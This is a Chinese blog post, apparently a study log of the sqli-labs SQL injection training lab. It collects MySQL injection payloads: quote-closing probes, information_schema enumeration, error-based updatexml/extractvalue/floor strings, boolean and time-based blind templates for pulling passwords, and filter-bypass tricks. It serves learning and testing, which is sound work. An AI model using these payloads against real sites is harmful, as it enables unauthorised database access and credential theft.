

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="sqli-labs靶场通关过程中，一些小的知识点以及其他知识点的学习">
  <meta name="author" content="corp0ra1">
  <meta name="keywords" content="">
  
  <title>sqli-labs靶场通关记录 - corp0ra1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"corp0ra1.cn","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":80,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"a1a4ccab78dfa522556928ac810fa739","google":"G-4X9XV0H0D5","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="corp0ra1's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 60vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
    <div class="container">
        <a class="navbar-brand" href="/">&nbsp;<strong>Corp0ra1's Blog</strong>&nbsp;</a>

        <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

        <!-- Collapsible content -->
        <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav ml-auto text-center">
                
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
                                        </li>
                                        
                                            
                                                
                                                    <li class="nav-item" id="search-btn">
                                                        <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
                                                    </li>
                                                    
                                                        
                                                            <li class="nav-item" id="color-toggle-btn">
                                                                <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
                                                            </li>
                                                            
                                                                <li class="nav-item">
                                                                    <a class="nav-link" href="/atom.xml">
                                                                        <i class="iconfont icon-rss"></i>
                                                                    </a>
                                                                </li>
            </ul>
        </div>
    </div>
</nav>
    <div class="banner" id="banner" parallax=true
         style="background: url('/img/tesla.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli-labs靶场通关记录">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2019-06-18 00:45" pubdate>
        2019年6月18日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      12.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      140
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

    <div class="container-fluid nopadding-x">
        <div class="row nomargin-x">
            <div class="d-none d-lg-block col-lg-2"></div>
            <div class="col-lg-8 nopadding-x-md">
                <div class="container nopadding-x-md" id="board-ctn">
                    <div class="py-5" id="board">
                        <article class="post-content mx-auto">
                            <!-- SEO header -->
                            <h1 style="display: none">
                                sqli-labs靶场通关记录
                            </h1>
                            <div class="markdown-body">
                                <h1 id="意外所得"><a href="#意外所得" class="headerlink" title="意外所得"></a>意外所得</h1><ul>
<li><p> 打算用exp作报错注入，然后发现了一个trick：select exp（@@version）等效于select exp(5.7)进而根据返回的值来逆推可以知道版本号<br>  作用甚微，毕竟都可以直接返回结果了，还需要绕一圈干啥，但是好歹自己发现的23333</p>
</li>
<li><p> 当在from后面输入一个不存在的数据库时，会报出当前数据库名称,进而可以考虑爆列名<br>select * from xxx;<br>ERROR 1146 (42S02): Table ‘security.xxx’ doesn’t exist</p>
</li>
<li><p>   select sleep(find_in_set(mid(@@version,1,1),’0,1,2,3,4,5,6,7,8,9,.’));</p>
<blockquote>
<p>该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可<br>取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。<br>同时我这里sleep 6秒原因是因为从0开始数，5刚刚好是第六位</p>
</blockquote>
</li>
<li><p>select * from table_name where username=”*/<em>’ and password=’</em>/ xxxx”</p>
<ul>
<li> /**/前后两个构成一个闭环，注释掉中间password的内容，则可以通过这种方式实现一定程度的bypass比如<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/179216#h3-18">iscc2019-web5</a></li>
<li>  适用情况：过滤掉了注释符号#和–+</li>
<li>  /<em>后面的</em>/必须闭合，必须，不然一定报错！为什么一定报错？问题超纲了</li>
<li>  sqli lab11的骚操作<code>passwd=*/or+&#39;1&amp;uname=1&#39;/*</code>===&gt;数据库的log显示<code>SELECT username, password FROM users WHERE username=&#39;1&#39; /* &#39; and password=&#39;*/or &#39;1&#39; LIMIT 0,1</code>即注入成功，但是这里没有过滤掉–+和#，所以对于less11而言这种操作可以有，但是没必要。作为验证性的还是挺好的</li>
</ul>
</li>
<li><p>  堆叠注入</p>
<blockquote>
<p>在select 等被BAN的情况下 使用show tables ,show xxx from xxx的作用<a target="_blank" rel="noopener" href="https://www.zhaoj.in/read-5873.html">https://www.zhaoj.in/read-5873.html</a></p>
</blockquote>
</li>
<li><p>   写Python脚本时候url里面不要直接#，要%23，不然老报错 </p>
</li>
<li><p>   order by </p>
<blockquote>
<p>select * from users where username=’admin’union select 1,2,’admin’order by 3,2;</p>
<blockquote>
<p>order by 3中的3表示第三列，即按照第三列排序<br>order by 3，2即先按照第三列拍，再按照第二列排序<br>我们在猜解第三列，还要order by 2干嘛？因为如果第三列刚刚好猜到密码为admin，此时排列的结果，可能是猜解的这一列在上，也可能是原表的admin这一列在上，具体排序结果不可控，从而导致盲注结果输出的不可知，进而无法判断出是否得到正确结果。因此增加一个第二列，因为第二列我们可预知，当第三列相同的时候，保证猜解的这一列在上！</p>
</blockquote>
</blockquote>
</li>
<li><p>  可以仔细分析返回的文件，也许会有细微的差别，而这个差别可能就对应注入的成功与否的标志<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190602005536.png" srcset="/img/loading.gif" lazyload alt="20190602005536.png"></p>
</li>
<li><p>/<em>!数字 代码</em>/存在的意义？比如/<em>!40101 select</em>/的意义？</p>
<ul>
<li>   /*!40101 SET NAMES gbk */;  代表的是  如果mysql 版本大于4.0.1.01  ，就执行后面的 set names gbk 这句代码。这就有一个好处，这样就可以把mysql 特有的功能用这种注释，给注释掉，对于非mysql数据库可以正常运行，不需要修改，而对于mysql 数据库，就可以利用这些特性。</li>
</ul>
</li>
<li><p>在测试空格绕过的时候发现了两点</p>
<ul>
<li>  存在半角和全角空格是不同的，全角因为编码问题可以绕过preg_math的空格机制</li>
<li>chr(194).chr(160) 在php编码之后也可以变成空格，从而达到绕过<a target="_blank" rel="noopener" href="https://www.cnblogs.com/zqifa/p/php-10.html?utm_source=itdadao&utm_medium=referral">传送门</a><br>对应的<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/42424555/trim-whitespace-ascii-character-194-from-string">原理</a>：大概意思就是全角的空格被当做&amp;nbsp这类实体空格符的编码方式<br>  但是不幸运的是全角的空格，在数据库中当做半角空格这样的间隔符使用会报错，即使我修改了数据库编码全为UTF-8格式。<br>  至于chr(194)这种格式，无法通过get参数传递进去。毕竟传递进去就是一个纯字符串的形式，无法解析字符串里面的函数chr进而实现空格的逃逸</li>
</ul>
</li>
<li><p>PDO为什么能防止sql注入？<br>  因为他会提前预处理：将sql语句提前在sql当中准备，等你填入id,然后直接把Id传给sql去执行，这个时候传递的id的值，将默认为字符串，从而导致不了闭合，因此就防止了（前提是你必须禁止本地客户端模拟sql，不然依然导致注入。当然宽字节注入可以通杀）</p>
</li>
<li><p>为什么16进制可以编码绕过？</p>
<ul>
<li>  在我的mysql cli里面，hex编码并不行，整个语句不行，单独的列名也不行</li>
<li>  在我各种姿势百度之后搜到了以下，仅仅供参考</li>
<li>  ①官方文档的解释</li>
</ul>
</li>
<li><p>sql新思路<code>select case when xxx  then sleep(2) else 0 end</code></p>
<ul>
<li>  强网<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/179598">传送门</a></li>
</ul>
</li>
</ul>
<h1 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h1><h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><ul>
<li>基于服务器接收到的响应<ul>
<li>  报错</li>
<li>  联合查询</li>
<li>  堆查询</li>
<li>盲注<ul>
<li>  布尔</li>
<li>  时间</li>
<li>  报错</li>
</ul>
</li>
</ul>
</li>
<li>基于如何处理输入的sql查询（数据类型）<ul>
<li>  字符串：<code>where name=xxx</code>（更常见）</li>
<li>  整形注入：<code>where id=xxx</code></li>
</ul>
</li>
<li>基于程度和顺序的注入（哪里发生了影响）<ul>
<li>  一阶注入:输入的注入语句直接对web产生影响，显示了结果</li>
<li>  二阶注入：类似存储性xss,是指输入的注入语句，无法直接对web应用程序产生影响，需要其他手段辅助来间接对web产生危害</li>
</ul>
</li>
<li>基于注入点位置<ul>
<li>  表单：get/post</li>
<li>  cookie</li>
<li>  header</li>
</ul>
</li>
</ul>
<h2 id="几个系统函数"><a href="#几个系统函数" class="headerlink" title="几个系统函数"></a>几个系统函数</h2><p>函数 | 作用 | 替代写法<br>| — |— |—|<br>version()|数据库版本|@@version<br>user()|数据库用户名|<br>database()|数据库名|<br>@@datadir|数据库路径|<br>@@version_compile_os|操作系统版本|<br>@@hostname|主机名|</p>
<blockquote>
<p>select后面可以直接跟这些函数，而不跟from xxx的格式（mysql支持这种，但是oracle不自持）<br>或者select xxx from dual格式也可以（通杀mysql oracle）</p>
</blockquote>
<h2 id="字符串链接函数"><a href="#字符串链接函数" class="headerlink" title="字符串链接函数"></a>字符串链接函数</h2><table>
<thead>
<tr>
<th>函数</th>
<th>介绍</th>
</tr>
</thead>
<tbody><tr>
<td>concat(str1,str2,…)</td>
<td>没有分隔符的连接字符串</td>
</tr>
<tr>
<td>concat_ws（separator,str1,str2,…）</td>
<td>以分隔符来连接字符串</td>
</tr>
<tr>
<td>group_concat(str1,str2,…)</td>
<td>连接参数产生的字符串。</td>
</tr>
</tbody></table>
<blockquote>
<p>这个三个函数都会出现这种情况:如果有一个参数为Null,则返回值为null<br>三个函数的用处是用于提高查询效率</p>
<blockquote>
<p>group_concat：突破limit的显示，直接把所有的行，集合在一起输出<br>如<code>http://sql.com/Less-1/?id=0&#39; union select 1,2,group_concat(username) from users--+</code>输出的结果是<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612175159.png" srcset="/img/loading.gif" lazyload alt="20190612175159.png"><br>再比如<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612175645.png" srcset="/img/loading.gif" lazyload alt="20190612175645.png"><br>可以看出，里面可以直接跟字段名，但是不能加上引号，不然当做常量，而非关键字/字段名<br>如果跟字段名的话，和order by组合并没有效果..</p>
</blockquote>
</blockquote>
<h2 id="注释符号"><a href="#注释符号" class="headerlink" title="注释符号"></a>注释符号</h2><ul>
<li>  –+（get表单中的填写方式）</li>
<li>  –%20（post表单中的填写方式）</li>
<li>  %23（get表单中的填写方式）</li>
<li>  #（post表单中的填写方式）</li>
<li>  – corporal 用来宣誓主权的写法</li>
</ul>
<h2 id="常用试探语句"><a href="#常用试探语句" class="headerlink" title="常用试探语句"></a>常用试探语句</h2><table>
<thead>
<tr>
<th>语句</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>or 1=1–+</td>
<td></td>
</tr>
<tr>
<td>‘or 1=1–+</td>
<td>单引号</td>
</tr>
<tr>
<td>“or 1=1–+</td>
<td>双引号</td>
</tr>
<tr>
<td>)or 1=1–+</td>
<td>括号</td>
</tr>
<tr>
<td>‘)or 1=1–+</td>
<td>单引号+括号</td>
</tr>
<tr>
<td>“) or 1=1–+</td>
<td>双引号+括号</td>
</tr>
<tr>
<td>“))or 1=1–+</td>
<td>双引号+双括号</td>
</tr>
</tbody></table>
<blockquote>
<p>and (select count(*) from mysql.user)&gt;0 来判断用户是否有权限dump into file</p>
<blockquote>
<p>天书里面写的！<a target="_blank" rel="noopener" href="https://www.cnblogs.com/lcamry/p/5763111.html">传送门</a></p>
</blockquote>
</blockquote>
<h2 id="抽取数据的流程"><a href="#抽取数据的流程" class="headerlink" title="抽取数据的流程"></a>抽取数据的流程</h2><p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190529161335.png" srcset="/img/loading.gif" lazyload alt="20190529161335.png"></p>
<blockquote>
<p>查库&gt;&gt;&gt;&gt;查表&gt;&gt;&gt;查列&gt;&gt;&gt;&gt;查内容 </p>
</blockquote>
<h3 id="正向查找之information-schema"><a href="#正向查找之information-schema" class="headerlink" title="正向查找之information_schema"></a>正向查找之information_schema</h3><p>目的|操作<br>|—|—|<br>猜数据库|select schema_name from information_schema.schemata<br>猜某库的数据表|select table_name from information_schema.tables where table_schema=’xxxxx’<br>猜某表的所有列|Select column_name from information_schema.columns where table_name=’xxxxx’<br>获取某列的内容|Select xxxx from xxxx</p>
<blockquote>
<p>引号别掉了<br>可以用limit来指定指定行的输出，但是速度太慢，可以考虑结果前面的group_concat的语法！</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190529161244.png" srcset="/img/loading.gif" lazyload alt="20190529161244.png"></p>
<h3 id="逆向思维之爆破"><a href="#逆向思维之爆破" class="headerlink" title="逆向思维之爆破"></a>逆向思维之爆破</h3><blockquote>
<p>mysql运行的实例部署的时候，用普通用户运行的时候，则你无权访问information_schema库<br>这个时候你就不能按照刚刚的思路正向查找</p>
</blockquote>
<p>目的|操作<br>|—|—|<br>猜列名|select * from users where id=1 and <strong>password</strong> is not null<br>猜表名|select * from users where id=1 and <strong>users</strong>.password is not null;<br>猜库名|select * from users where id=1 and <strong>security</strong>.users.password is not null;<br>猜库里其他的表名| select * from users where id=1 and (select count(<em>) from <strong>emails</strong>)&gt;0;<br>猜该表和列对应关系|select * from users where id=1 and (select count(</em>) from emails where <strong>id</strong> is not null)&gt;0;<br>猜表里面列的内容| select * from users where id=1 and (select ord(mid((select email_id from emails where email_id is not null limit 0,1),<strong>1</strong>,1)))=<strong>68</strong>;<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190529161141.png" srcset="/img/loading.gif" lazyload alt="20190529161141.png"></p>
<blockquote>
<p>其他库就猜不来了，毕竟mysql_connect的时候会指定数据库</p>
</blockquote>
<h3 id="其他数据库操作"><a href="#其他数据库操作" class="headerlink" title="其他数据库操作"></a>其他数据库操作</h3><p>group by：后面可以接合其它函数来达到报错注入效果<br>order by N：猜解列数<br>union :联合查询（union all：不去重的查询）</p>
<p>limit n：检索前五行<br>limit n,m：从第n行开始，检索m行（n从0开始）<br>limit n offest m：从第M行开始，检索n行（m从0开始）<br>（<strong>和上面的区别在于下面的可以绕过对逗号的过滤</strong>）</p>
<h3 id="其他注入"><a href="#其他注入" class="headerlink" title="其他注入"></a>其他注入</h3><p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611220719.png" srcset="/img/loading.gif" lazyload alt="20190611220719.png"><br>前面都是where 这里的闭合技巧<br>而where 后面可以跟上group by ，order by ，limit等都会成为注入的点，具体见下文</p>
<hr>
<h1 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h1><p>盲注即不直接显示出输出结果</p>
<h2 id="基础-1"><a href="#基础-1" class="headerlink" title="基础"></a>基础</h2><h3 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h3><p><strong>字符串处理函数</strong><br>|函数|介绍|<br>|—|—|<br>substring_index（str,x,n）|以str中的X为分隔符，将str分为若干段，返回第n段内容<br>mid（str,x,l）|返回以字符串以X为起点，长度为L的子串<br>left(str,n)|从字符串左边截取前n位</p>
<p><strong>字符处理函数</strong><br>|函数|介绍|<br>|—|—|<br>ord()|返回字符串的首个字符的 ASCII 值<br>ascii()|返回字符串str的最左面字符的ASCII代码值。<br>char()|以字符的形式呈现出来</p>
<blockquote>
<p>是char 而非chr，chr会报错，因为mysql是char,oracle才是chr。我输入chr作为函数的的原因是php中chr（）函数的作用是以字符的形式呈现出来，而mysql里面没有chr函数</p>
</blockquote>
<h2 id="模糊匹配字符"><a href="#模糊匹配字符" class="headerlink" title="模糊匹配字符"></a>模糊匹配字符</h2><blockquote>
<p>部分参考freebuf的010师傅<a target="_blank" rel="noopener" href="https://www.freebuf.com/news/139288.html">传送门</a></p>
</blockquote>
<h3 id="正则匹配"><a href="#正则匹配" class="headerlink" title="正则匹配"></a>正则匹配</h3><ul>
<li>   <code>select * from users where id=1 and 1=(if((user() regexp &#39;^r&#39;),1,0));</code></li>
<li>   <code>select * from users where id=1 and 1=(user() regexp &#39;^ro&#39;);</code></li>
<li>   <code>select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema=&#39;security&#39; and table_name regexp &#39;^us[a-z]&#39; limit 0,1);</code></li>
</ul>
<blockquote>
<p>不要止步于匹配成功，毕竟regexp ‘user’匹配到user和user_password都是成功，但是user不一定是正确结果，却会让你终止匹配</p>
</blockquote>
<h3 id="like匹配"><a href="#like匹配" class="headerlink" title="like匹配"></a>like匹配</h3><ul>
<li>   <code>select * from users where id=1 and 1=(user() like &#39;ro%&#39;);</code><blockquote>
<p>只有%和_，没有^和$。这里不是php里面的正则写法！<br>只能是’’，而非‘’。注意中英文的引号区别</p>
</blockquote>
</li>
</ul>
<h3 id="in"><a href="#in" class="headerlink" title="in"></a>in</h3><p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612195425.png" srcset="/img/loading.gif" lazyload alt="20190612195425.png"><br>而且可以不需要等号 不需要空格 毕竟两边都是括号！<strong>不需要空格间隔</strong>！！！</p>
<h3 id="between-and"><a href="#between-and" class="headerlink" title="between and"></a>between and</h3><p>c  beween a and b满足a≤c＜b的关系<br>因为一边是小于等于，一边是小于，所以可以基于 chr(x) chr(x+1)的形式来匹配字符<br>当匹配到第一个字符的时候 j的时候，在进行下一个字符比较，可以达到爆破的效果<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612201436.png" srcset="/img/loading.gif" lazyload alt="20190612201436.png"><br>因为两边都是单引号包围的，则可以通过十六进制的形式来绕过，<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612201910.png" srcset="/img/loading.gif" lazyload alt="20190612201910.png"><br>当然可以通过括号的形式，来绕过对空格的过滤。<br>但是因为and都可以使用了，其他的爆破方式基本应该可以使用，就显得比较鸡肋，但是我相信总有一天他会有用的！！！！</p>
<h3 id="order-by"><a href="#order-by" class="headerlink" title="order by"></a>order by</h3><p>没想到吧！其实我也没想到！<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612202628.png" srcset="/img/loading.gif" lazyload alt="20190612202628.png"><br>感觉也比较鸡肋，比较都可以联合查询了！<br>但是如果所有函数都禁止使用了呢，regexp,in,like，and也被过滤了呢，是金子总会发光！</p>
<h3 id="大于小于等于号"><a href="#大于小于等于号" class="headerlink" title="大于小于等于号"></a>大于小于等于号</h3><p>当你意识到between and的时候，就应该意识到大于小于的问题了<br>但是必须搭配and<br>不搭配and无法准确爆破，只能如下图一样得到最大，最小两端的两个极值<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190612203542.png" srcset="/img/loading.gif" lazyload alt="20190612203542.png"></p>
<h2 id="盲注方法"><a href="#盲注方法" class="headerlink" title="盲注方法"></a>盲注方法</h2><p>报错注入&gt;bool直接盲注&gt;bool构造报错盲注&gt;bool构造时间盲注</p>
<h3 id="报错之构造payload让信息通过错误提示回显出来"><a href="#报错之构造payload让信息通过错误提示回显出来" class="headerlink" title="报错之构造payload让信息通过错误提示回显出来"></a>报错之构造payload让信息通过错误提示回显出来</h3><table>
<thead>
<tr>
<th>函数</th>
<th>作用</th>
<th>利用</th>
<th>环境</th>
</tr>
</thead>
<tbody><tr>
<td>updatexml</td>
<td>第二个参数</td>
<td>updatexml(1,(concat(0x7c,(select @@version))),1);</td>
<td>5.7.26</td>
</tr>
<tr>
<td>extractvalue</td>
<td>第二个参数</td>
<td>select extractvalue(1,concat(0x7c,(select user())));</td>
<td>5.7.26</td>
</tr>
<tr>
<td>floor</td>
<td>主键的唯一性</td>
<td>select * from (select count(*), concat(floor(rand(0)*2),(select user())) a from information_schema.tables group by a)b;</td>
<td>5.7.26</td>
</tr>
<tr>
<td>exp</td>
<td>范围&gt;709报错</td>
<td>select exp(710)</td>
<td><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/253">≤5.5.47</a></td>
</tr>
<tr>
<td>还有几个基于几何参数类型不匹配的六大天王，<a target="_blank" rel="noopener" href="https://corp0ra1.github.io/2019/05/22/%E6%B3%A8%E5%85%A5%E5%86%8D%E6%8E%A2/#%E4%B8%83%E4%B8%AA%E8%91%AB%E8%8A%A6%E5%A8%83">传送门</a></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<blockquote>
<p>很多开发人员禁止了回显错误,所以这个时候在这之上开发bool盲注<br>同时报错信息是有长度限制的，在mysql/my_error.c中可以看到：<br><code>/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */</code><br><code>#define ERRMSGSIZE (512)</code></p>
</blockquote>
<p><strong>BTW</strong><br>个人<code> 5.7.26-0ubuntu0.18.04.1</code>利用less5测试之后，发现基于XPath注入仍然适用，floor注入不稳定，并不能一次命中（尝试10次6次失败）</p>
<blockquote>
<img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/Peek 2019-05-31 19-19.gif" srcset="/img/loading.gif" lazyload/>
而基于exp()以及几何六巨头的报错已经宣告死亡（当然只是不能爆出有效信息，可以尝试接合bool报错倒是可以的）
**补充**
关于floor，如果information表被禁用了，同时关键表名被过滤或者不知道表名
</blockquote>
<ul>
<li>   select count(*) from (select 1 union select null union select !1)a group by concat(version(),floor(rand(0)*2));<br>核心还是在于主键的唯一性，利用union构造出一个100的表，同时后面再跟这union几个都没问题，但是这个别人测试的说明这个构造比较好，如果!被禁用，则可以是其他数字1或者0，自行发挥，自行测试</li>
<li>如果rand被禁用了则可以用用户变量代替<br>select min(@a:=1) from information_schema.tables group by concat(version(),@a:=(@a+1)%2);<blockquote>
<p>什么是@？用法？<br>  mysql中变量不用事前申明，在用的时候直接用“@变量名”使用就可以了。<br>  使用set时可以用“=”或“：=”，但是使用select时必须用“：=赋值”<br>  也就是a的值0101不断变化，从而达到rand的效果</p>
</blockquote>
</li>
</ul>
<p><strong>5.7.26测试成功</strong><br><strong>加餐</strong>：基于列名重复的报错<br><code>select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;</code><br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190601085902.png" srcset="/img/loading.gif" lazyload alt="20190601085902.png"><br>然而这个报错注入很鸡肋,没有多大用,尝试了一下只用version()函数可以使用,其他可能因为不是常量的原因.</p>
<h3 id="布尔之直接构造逻辑判断-爆破"><a href="#布尔之直接构造逻辑判断-爆破" class="headerlink" title="布尔之直接构造逻辑判断+爆破"></a>布尔之直接构造逻辑判断+爆破</h3><p>根据上面的函数，来构造注入参数，从而形成判断，进而得出结果<br>基于Less-5</p>
<blockquote>
<p>不仅限于ord，还有ascii,char等<br>不仅限于此类爆破注入，还有基于正则的方法</p>
</blockquote>
<table>
<thead>
<tr>
<th>用途</th>
<th>函数</th>
<th>补充</th>
</tr>
</thead>
<tbody><tr>
<td>爆所有库名</td>
<td>?id=1’ and ord(mid((select schema_name from information_schema.schemata limit %d,1),%d,1))=%d %%23</td>
<td>是shemata，不是其他 别自作聪明</td>
</tr>
<tr>
<td>爆当前库名</td>
<td>id=1’ and ord(mid((select database()),%d,1))=%d %23</td>
<td></td>
</tr>
<tr>
<td>爆库里所有表</td>
<td>?id=1’ and ord(mid((select table_name from information_schema.tables where table_schema=’security’ limit %d,1),%d,1))=%d %%23</td>
<td></td>
</tr>
<tr>
<td>爆列</td>
<td>Select column_name from information_schema.columns where table_name=’users’;</td>
<td>如果是用户当前使用的表的话，会多三列（见下图的红框框）</td>
</tr>
<tr>
<td>爆内容</td>
<td>?id=1’ and ord(mid((select password from users limit %d,1),%d,1))=%d %%23</td>
<td>可以后面加上where爆指定列</td>
</tr>
<tr>
<td><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190530114227.png" srcset="/img/loading.gif" lazyload alt="20190530114227.png"></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<blockquote>
<p>MySQL 5.0以上版本存在一个存储着数据库信息的信息数据库–INFORMATION_SCHEMA ，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。 而5.0以下没有。<strong>因此利用环境在5.0以上</strong></p>
</blockquote>
<h3 id="布尔之构造形成报错的bool表达式-爆破"><a href="#布尔之构造形成报错的bool表达式-爆破" class="headerlink" title="布尔之构造形成报错的bool表达式+爆破"></a>布尔之构造形成报错的bool表达式+爆破</h3><p>由于报错信息可能会被ban，就可以接合二者<br>and if(xxx,1，nnnn),其中xxx就是上面构造的爆库语句，nnnn就是上面的报错语句，如果爆库语句是错的，则会报错，不然就返回1</p>
<blockquote>
<p>?id=1’ and IF(ord(mid((select password from users limit %d,1),%d,1))=%d,1,exp(710)) %%23</p>
</blockquote>
<h3 id="布尔之构造形成时延的bool表达式-爆破"><a href="#布尔之构造形成时延的bool表达式-爆破" class="headerlink" title="布尔之构造形成时延的bool表达式+爆破"></a>布尔之构造形成时延的bool表达式+爆破</h3><p>我的一篇文章<a target="_blank" rel="noopener" href="https://corp0ra1.github.io/2019/05/22/%E6%B3%A8%E5%85%A5%E5%86%8D%E6%8E%A2/#%E6%97%B6%E9%97%B4%E5%BB%B6%E8%BF%9F">传送门</a></p>
<blockquote>
<p>?id=1’ and IF(ord(mid((select password from users limit %d,1),%d,1))=%d,sleep(5),1) %%23</p>
<blockquote>
<p>sleep(5)在前面的话 因为经常报错，放在if判断的后面部分的话节省时间<br>Python脚本对应的基于时间判断正误：if time.time() - starttime &gt; 2: 则xxxxx。而startime在执行get请求赋值为starttime=time.time即可,记得import time</p>
</blockquote>
</blockquote>
<h3 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h3><p>可参考我的两篇文章：</p>
<ul>
